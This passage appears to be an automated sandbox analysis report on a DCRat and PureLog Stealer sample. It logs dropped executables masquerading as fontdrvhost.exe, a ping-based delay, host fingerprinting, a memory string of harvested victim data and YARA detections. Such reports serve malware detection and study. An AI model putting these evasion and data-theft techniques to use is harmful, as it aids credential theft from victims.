Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"

Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`%
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.000000000286E000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"15","Cookies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.1",5,1,"NEWORK PC","user","571345","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Drivers","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: kies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.1",5,1,"NEWORK PC","user","571345","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Drivers","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FBF654 cpuid

0_2_00FBF654

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00FBAF0F

Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Queries volume information: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Queries volume information: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Drivers\fontdrvhost.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Queries volume information: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe VolumeInformation

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00FBDF1E

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FAB146 GetVersionExW,

0_2_00FAB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 5012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 6324, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: YGk3y6Tdix.exe, type: SAMPLE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.68606f6.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.52076f6.1.unpack, type: UNPACKEDPE
